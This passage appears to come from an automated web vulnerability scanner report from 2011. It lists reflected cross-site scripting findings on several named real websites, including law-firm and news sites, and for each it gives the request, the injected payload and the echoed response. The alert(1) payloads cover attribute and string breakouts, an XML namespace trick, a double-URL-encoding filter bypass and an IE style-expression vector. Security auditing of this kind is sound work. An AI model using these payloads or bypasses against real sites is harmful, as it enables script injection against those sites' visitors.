The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 10b9d"-alert(1)-"77d9442451f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /USA/Justice/201110b9d"-alert(1)-"77d9442451f/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law HTTP/1.1 Host: www.csmonitor.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: Apache/2.2.12 (Ubuntu) X-Powered-By: eZ Publish Pragma: no-cache Last-Modified: Wed, 19 Jan 2011 15:48:08 GMT Served-by: Content-Language: en-US Status: 404 Not Found Content-Type: text/html; charset=utf-8 Cache-Control: public, must-revalidate, max-age=86400 Expires: Thu, 20 Jan 2011 15:48:08 GMT Date: Wed, 19 Jan 2011 15:48:08 GMT Content-Length: 22012 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 133fa"-alert(1)-"9a2b6004857 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /USA/Justice/2011/0118133fa"-alert(1)-"9a2b6004857/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law HTTP/1.1 Host: www.csmonitor.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: Apache/2.2.12 (Ubuntu) X-Powered-By: eZ Publish Pragma: no-cache Last-Modified: Wed, 19 Jan 2011 15:48:15 GMT Served-by: Content-Language: en-US Status: 404 Not Found Content-Type: text/html; charset=utf-8 Cache-Control: public, must-revalidate, max-age=86400 Expires: Thu, 20 Jan 2011 15:48:15 GMT Date: Wed, 19 Jan 2011 15:48:15 GMT Content-Length: 22012 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 12fdc"-alert(1)-"b91d9019faa was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /USA/Justice/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law12fdc"-alert(1)-"b91d9019faa HTTP/1.1 Host: www.csmonitor.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: Apache/2.2.12 (Ubuntu) X-Powered-By: eZ Publish Pragma: no-cache Last-Modified: Wed, 19 Jan 2011 15:48:20 GMT Served-by: Content-Language: en-US Status: 404 Not Found Content-Type: text/html; charset=utf-8 Cache-Control: public, must-revalidate, max-age=86367 Expires: Thu, 20 Jan 2011 15:47:47 GMT Date: Wed, 19 Jan 2011 15:48:20 GMT Content-Length: 22012 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d392"><script>alert(1)</script>ceb88aaba32 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /chamber6d392"><script>alert(1)</script>ceb88aaba32/memberDetail.asp HTTP/1.1 Host: www.dcchamber.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Wed, 19 Jan 2011 15:48:15 GMT Server: Apache/2.0.63 (Red Hat) Set-Cookie: PHPSESSID=0ilpmfogoftmdtsc2djk1fdtm3; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>DC Chamber of Commer ...[SNIP]... <a href="/chamber6d392"><script>alert(1)</script>ceb88aaba32/memberDetail.aspindex.php?src=gendocs&ref=ERROR&link=ERROR&login="> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 12668"><script>alert(1)</script>2f451230e52 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /chamber/memberDetail.asp12668"><script>alert(1)</script>2f451230e52 HTTP/1.1 Host: www.dcchamber.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Wed, 19 Jan 2011 15:48:20 GMT Server: Apache/2.0.63 (Red Hat) Set-Cookie: PHPSESSID=pkp73ol8c1315pd6btr3ijgkr3; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>DC Chamber of Commer ...[SNIP]... <a href="/chamber/memberDetail.asp12668"><script>alert(1)</script>2f451230e52index.php?src=gendocs&ref=ERROR&link=ERROR&login="> ...[SNIP]...
The value of the db request parameter is copied into the HTML document as plain text between tags. The payload e00cf<script>alert(1)</script>182e67954d6 was submitted in the db parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /cgi-bin/classifieds/classifieds.cgi?db=rentalse00cf<script>alert(1)</script>182e67954d6 HTTP/1.1 Host: www.dcregistry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 19 Jan 2011 15:48:03 GMT Server: Apache/2.2.11 (Unix) FrontPage/5.0.2.2635 PHP/5.2.6 Connection: close Content-Type: text/html Content-Length: 528
We're sorry, but the script was unable to require /usr/home/dcreg/public_html/www.dcregistry.com/cgi-bin/classifieds/db/rentalse00cf<script>alert(1)</script>182e67954d6.db at line 215 in classifieds.cgi. Please make sure that these files exist, that you have the path set correctly, and that the permissions are set properly. This message could also indicate that a s ...[SNIP]...
4.94. http://www.ebglaw.com/showoffice.aspx [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ebglaw.com
Path:
/showoffice.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 45f31'><script>alert(1)</script>f88730a84f4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /showoffice.aspx?Show=542&45f31'><script>alert(1)</script>f88730a84f4=1 HTTP/1.1 Host: www.ebglaw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:48:33 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Pragma: no-cache Set-Cookie: ASP.NET_SessionId=wiqyja45mfzer0uwjqmgms45; path=/ Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 63794
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"> <head pro ...[SNIP]... <a href='showoffice.aspx?Show=542&45f31'><script>alert(1)</script>f88730a84f4=1&PrintPage=True'> ...[SNIP]...
4.95. http://www.ebglaw.com/showoffice.aspx [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ebglaw.com
Path:
/showoffice.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5a79d'-alert(1)-'f0c22b0c26f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /showoffice.aspx?Show=542&5a79d'-alert(1)-'f0c22b0c26f=1 HTTP/1.1 Host: www.ebglaw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:48:34 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Pragma: no-cache Set-Cookie: ASP.NET_SessionId=xxbjjcegd5hxmw55jxay4l3b; path=/ Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 63749
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"> <head pro ...[SNIP]... <350) { location.href='showoffice.aspx?Show=542&5a79d'-alert(1)-'f0c22b0c26f=1&mobile=True' }
The value of the eTitle request parameter is copied into the HTML document as plain text between tags. The payload 8d254<script>alert(1)</script>39610b88ceb was submitted in the eTitle parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index.cfm?fuseaction=correspondence.emailform&site_id=299&eTitle=Washington%2C%20D%2EC%2E8d254<script>alert(1)</script>39610b88ceb HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:49:17 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFID=24113095;path=/ Set-Cookie: CFTOKEN=35971701;path=/ Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A49%3A17%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D395%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:49:17 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The value of the eTitle request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94895"><script>alert(1)</script>288abb3048 was submitted in the eTitle parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index.cfm?fuseaction=correspondence.emailform&site_id=299&eTitle=Washington%2C%20D%2EC%2E94895"><script>alert(1)</script>288abb3048 HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:49:16 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFID=24113095;path=/ Set-Cookie: CFTOKEN=35971701;path=/ Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A49%3A16%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D369%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:49:16 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The value of the fuseaction request parameter is copied into the HTML document as plain text between tags. The payload 6f457<script>alert(1)</script>e9f570c8d27 was submitted in the fuseaction parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index.cfm?fuseaction=news.site6f457<script>alert(1)</script>e9f570c8d27&site_id=299 HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:49:02 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFID=24113095;path=/ Set-Cookie: CFTOKEN=35971701;path=/ Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A49%3A02%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D218%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:49:02 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
...[SNIP]... </h2>
I received a fuseaction called "news.site6f457<script>alert(1)</script>e9f570c8d27" I don't know what to do with!<br> ...[SNIP]...
The value of the fuseaction request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 145fe"><script>alert(1)</script>aed5c335ef1 was submitted in the fuseaction parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index.cfm?fuseaction=news.site145fe"><script>alert(1)</script>aed5c335ef1&site_id=299 HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:49:00 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFID=24113095;path=/ Set-Cookie: CFTOKEN=35971701;path=/ Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A49%3A00%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D210%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:49:00 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
4.100. http://www.fulbright.com/index.cfm [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.fulbright.com
Path:
/index.cfm
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fed44"><script>alert(1)</script>c707a822c6a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index.cfm?fuseaction=news.site&site_id=299&fed44"><script>alert(1)</script>c707a822c6a=1 HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:49:39 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFID=24113095;path=/ Set-Cookie: CFTOKEN=35971701;path=/ Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A49%3A39%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D575%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:49:39 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The value of the pf request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 660d3"><script>alert(1)</script>39aa8a72e69 was submitted in the pf parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index.cfm?FUSEACTION=home.299&pf=y660d3"><script>alert(1)</script>39aa8a72e69 HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:48:52 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFID=24113095;path=/ Set-Cookie: CFTOKEN=35971701;path=/ Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A48%3A52%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D161%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.16.1.67;expires=Fri, 11-Jan-2041 15:48:52 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The value of the rss request parameter is copied into the value of an XML tag attribute which is encapsulated in double quotation marks. The payload 1c76a"><a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>2edafab2731 was submitted in the rss parameter. This input was echoed as 1c76a"><a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>2edafab2731 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.
Request
GET /index.cfm?fuseaction=news.allrss&site_id=286&rss=y1c76a"><a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>2edafab2731 HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:49:44 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFID=24113095;path=/ Set-Cookie: CFTOKEN=35971701;path=/ Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A49%3A44%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D626%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:49:44 GMT;path=/ Content-Type: text/xml
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2ee2d%253cscript%253ealert%25281%2529%253c%252fscript%253e72356283334 was submitted in the REST URL parameter 1. This input was echoed as 2ee2d<script>alert(1)</script>72356283334 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /washington%20dc%20law%20firms2ee2d%253cscript%253ealert%25281%2529%253c%252fscript%253e72356283334 HTTP/1.1 Host: www.info.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>Info.com - washington dc law firms2ee2d%3cscript%3ealert%281%29%3c%2fscript%3e72356283334 - www.Info.com</title><l ...[SNIP]... <a href="http://Info.com/searchw?qkw=washington+dc+law+firms+2ee2d%3Cscript%3Ealert%281%29%3C%2Fscript%3E72356283334&r_cop=spell" style="text-decoration:underline">washington dc law firms 2ee2d<script>alert(1)</script>72356283334</a> ...[SNIP]...
4.104. http://www.jonesdaydiversity.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.jonesdaydiversity.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2d512'-alert(1)-'f727d73fb9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?2d512'-alert(1)-'f727d73fb9=1 HTTP/1.1 Host: www.jonesdaydiversity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html>
<head> <title id="ctl00_htmlTitle">Jones Day Diversity</title> <link rel="stylesheet" ...[SNIP]... <![CDATA[ var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/Home.aspx?2d512'-alert(1)-'f727d73fb9=1';//]]> ...[SNIP]...
4.105. http://www.learnestateplanning.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.learnestateplanning.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload faa91"><script>alert(1)</script>3a8a42ea6f9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?faa91"><script>alert(1)</script>3a8a42ea6f9=1 HTTP/1.1 Host: www.learnestateplanning.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Wed, 19 Jan 2011 16:52:08 GMT Content-type: text/html Connection: close
The value of the CID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b7005"style%3d"x%3aexpression(alert(1))"e433a090613 was submitted in the CID parameter. This input was echoed as b7005"style="x:expression(alert(1))"e433a090613 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /results.aspx?keyword=law+offices&CID=2531/x22b7005"style%3d"x%3aexpression(alert(1))"e433a090613 HTTP/1.1 Host: www.local.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the CID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload abc1a"%3bbdb542a73ab was submitted in the CID parameter. This input was echoed as abc1a";bdb542a73ab in the application's response.
